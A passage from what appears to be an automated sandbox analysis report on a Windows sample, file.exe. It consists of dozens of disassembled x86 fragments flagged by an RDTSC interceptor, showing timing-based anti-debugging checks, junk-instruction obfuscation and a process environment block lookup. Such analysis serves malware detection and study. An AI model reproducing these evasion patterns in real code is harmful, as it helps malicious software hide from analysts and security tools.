0x0000006a mov edi, 3C9E7304h 0x0000006f mov di, 319Ch 0x00000073 popad 0x00000074 push FFFFFFFFh 0x00000076 mov ebx, 5694AD65h 0x0000007b nop 0x0000007c pushad 0x0000007d push eax 0x0000007e push edx 0x0000007f jp 00007F70F070E5C6h 0x00000085 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA4071 second address: DA4075 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA91B0 second address: DA91B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA833E second address: DA8348 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F70F0BCDB06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAC3C4 second address: DAC466 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F70F070E5C8h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 jmp 00007F70F070E5D7h 0x0000002c push 00000000h 0x0000002e jmp 00007F70F070E5D0h 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push eax 0x00000038 call 00007F70F070E5C8h 0x0000003d pop eax 0x0000003e mov dword ptr [esp+04h], eax 0x00000042 add dword ptr [esp+04h], 00000015h 0x0000004a inc eax 0x0000004b push eax 0x0000004c ret 0x0000004d pop eax 0x0000004e ret 0x0000004f and ebx, dword ptr [ebp+122D3147h] 0x00000055 mov ebx, dword ptr [ebp+122D2BA9h] 0x0000005b xchg eax, esi 0x0000005c jmp 00007F70F070E5CDh 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 jnp 00007F70F070E5CCh 0x0000006a jp 00007F70F070E5C6h 0x00000070 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAA59B second address: DAA5C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 jo 00007F70F0BCDB27h 0x0000000f pushad 0x00000010 jmp 00007F70F0BCDB19h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAB53B second address: DAB53F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAB53F second address: DAB543 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAB543 second address: DAB549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3EEE2 second address: D3EEEC instructions: 0x00000000 rdtsc 0x00000002 ja 00007F70F0BCDB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3EEEC second address: D3EEFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F070E5CBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3EEFB second address: D3EEFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB6812 second address: DB6818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB6818 second address: DB681C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB681C second address: DB683D instructions: 0x00000000 rdtsc 0x00000002 jns 00007F70F070E5C6h 0x00000008 jmp 00007F70F070E5CCh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jng 00007F70F070E5C8h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB6989 second address: DB69A1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pushad 0x00000010 jno 00007F70F0BCDB06h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBDB4F second address: DBDB69 instructions: 0x00000000 rdtsc 0x00000002 je 00007F70F070E5CCh 0x00000008 js 00007F70F070E5C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 jg 00007F70F070E5D4h 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBDB69 second address: DBDB6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC49CF second address: DC49D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC3C9F second address: DC3CA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC4233 second address: DC4268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F70F070E5D9h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c jmp 00007F70F070E5D5h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC4423 second address: DC4429 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC4429 second address: DC4450 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5CEh 0x00000007 pushad 0x00000008 jl 00007F70F070E5C6h 0x0000000e jmp 00007F70F070E5CEh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5302A second address: D53030 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D53030 second address: D5303D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007F70F070E5C6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5303D second address: D53057 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007F70F0BCDB0Ch 0x00000011 je 00007F70F0BCDB06h 0x00000017 push edi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D53057 second address: D5305E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5305E second address: D53063 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC98E3 second address: DC98F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC98F8 second address: DC98FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC98FE second address: DC9904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC9904 second address: DC9908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC9BB5 second address: DC9BBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC9D31 second address: DC9D3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F70F0BCDB06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC9D3B second address: DC9D3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DCA44C second address: DCA450 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DCA450 second address: DCA458 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DCA996 second address: DCA99C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DCA99C second address: DCA9A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DCA9A6 second address: DCA9B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F70F0BCDB0Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DCA9B7 second address: DCA9EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F70F070E5D3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F70F070E5D2h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DCA9EB second address: DCA9EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DCA9EF second address: DCAA1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F70F070E5D6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push edi 0x0000000d pop edi 0x0000000e jmp 00007F70F070E5CEh 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DCAA1D second address: DCAA3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F70F0BCDB19h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DCAA3B second address: DCAA50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F70F070E5C6h 0x0000000a jo 00007F70F070E5C6h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DCAA50 second address: DCAA54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8D8AC second address: D8D8C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F70F070E5D8h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8D8C9 second address: D8D8E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F0BCDB18h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8D8E5 second address: D72A36 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dword ptr [ebp+12479AACh], esi 0x00000011 call dword ptr [ebp+122D35F9h] 0x00000017 pushad 0x00000018 push ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8DCD6 second address: D8DCDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8DCDC second address: D8DCE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F63844 second address: F63848 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F63AAD second address: F63AD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F63B76 second address: F63BF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jmp 00007F70F0BCDB0Bh 0x00000011 call 00007F70F0BCDB16h 0x00000016 mov dword ptr [ebp+122D1C42h], ecx 0x0000001c pop edx 0x0000001d push 00000004h 0x0000001f push 00000000h 0x00000021 push esi 0x00000022 call 00007F70F0BCDB08h 0x00000027 pop esi 0x00000028 mov dword ptr [esp+04h], esi 0x0000002c add dword ptr [esp+04h], 0000001Ah 0x00000034 inc esi 0x00000035 push esi 0x00000036 ret 0x00000037 pop esi 0x00000038 ret 0x00000039 sub dword ptr [ebp+12478A83h], ecx 0x0000003f call 00007F70F0BCDB09h 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 jbe 00007F70F0BCDB06h 0x0000004d jo 00007F70F0BCDB06h 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F63BF4 second address: F63C17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F70F070E5D0h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 jnp 00007F70F070E5C6h 0x00000017 pop esi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F63C17 second address: F63C3D instructions: 0x00000000 rdtsc 0x00000002 jng 00007F70F0BCDB08h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push esi 0x00000011 jnc 00007F70F0BCDB0Ch 0x00000017 pop esi 0x00000018 mov eax, dword ptr [eax] 0x0000001a push eax 0x0000001b push edx 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f pop edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F63C3D second address: F63C42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F68E05 second address: F68E0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F68E0B second address: F68E0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F68E0F second address: F68E17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F68E17 second address: F68E2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F070E5D2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F68E2D second address: F68E31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260044 second address: 726004A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 726004A second address: 7260050 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260050 second address: 72600C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr fs:[00000030h] 0x00000011 jmp 00007F70F070E5D0h 0x00000016 sub esp, 18h 0x00000019 jmp 00007F70F070E5D0h 0x0000001e xchg eax, ebx 0x0000001f jmp 00007F70F070E5D0h 0x00000024 push eax 0x00000025 pushad 0x00000026 mov bx, AB84h 0x0000002a pushad 0x0000002b mov edi, 3AADCBEEh 0x00000030 mov al, dh 0x00000032 popad 0x00000033 popad 0x00000034 xchg eax, ebx 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F70F070E5CDh 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72600C6 second address: 72600CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72600CC second address: 72600D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72600D0 second address: 72600D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72600D4 second address: 72600E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [eax+10h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72600E5 second address: 72600EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72600EB second address: 726012A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F70F070E5CBh 0x00000013 jmp 00007F70F070E5D3h 0x00000018 popfd 0x00000019 movzx eax, dx 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 726012A second address: 7260130 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260130 second address: 7260134 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260134 second address: 7260155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F70F0BCDB16h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260155 second address: 7260238 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F70F070E5D4h 0x00000011 jmp 00007F70F070E5D5h 0x00000016 popfd 0x00000017 popad 0x00000018 mov esi, dword ptr [759B06ECh] 0x0000001e jmp 00007F70F070E5CDh 0x00000023 test esi, esi 0x00000025 jmp 00007F70F070E5CEh 0x0000002a jne 00007F70F070F423h 0x00000030 pushad 0x00000031 jmp 00007F70F070E5CEh 0x00000036 mov edx, ecx 0x00000038 popad 0x00000039 xchg eax, edi 0x0000003a pushad 0x0000003b mov ecx, 408172F9h 0x00000040 call 00007F70F070E5D6h 0x00000045 jmp 00007F70F070E5D2h 0x0000004a pop eax 0x0000004b popad 0x0000004c push eax 0x0000004d pushad 0x0000004e mov edi, eax 0x00000050 pushfd 0x00000051 jmp 00007F70F070E5CAh 0x00000056 and eax, 199ACE68h 0x0000005c jmp 00007F70F070E5CBh 0x00000061 popfd 0x00000062 popad 0x00000063 xchg eax, edi 0x00000064 push eax 0x00000065 push edx 0x00000066 jmp 00007F70F070E5D5h 0x0000006b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260238 second address: 726023E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 726023E second address: 7260242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260242 second address: 7260278 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB13h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b call dword ptr [75980B60h] 0x00000011 mov eax, 75F3E5E0h 0x00000016 ret 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F70F0BCDB15h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260278 second address: 726027F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 726027F second address: 72602B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push 00000044h 0x00000009 jmp 00007F70F0BCDB19h 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F70F0BCDB0Dh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72602B1 second address: 7260325 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 11FF5532h 0x00000008 pushfd 0x00000009 jmp 00007F70F070E5D3h 0x0000000e sub ax, 972Eh 0x00000013 jmp 00007F70F070E5D9h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, edi 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov di, 448Eh 0x00000024 pushfd 0x00000025 jmp 00007F70F070E5CFh 0x0000002a sbb ah, 0000003Eh 0x0000002d jmp 00007F70F070E5D9h 0x00000032 popfd 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260325 second address: 726032B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 726032B second address: 726032F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 726032F second address: 7260333 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260333 second address: 7260370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F70F070E5CBh 0x00000010 adc si, 2F4Eh 0x00000015 jmp 00007F70F070E5D9h 0x0000001a popfd 0x0000001b popad 0x0000001c xchg eax, edi 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260370 second address: 7260376 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260376 second address: 726039A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, bx 0x00000006 mov edx, 1B2C73E0h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push dword ptr [eax] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F70F070E5D2h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 726039A second address: 72603AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F0BCDB0Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72603AC second address: 72603B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
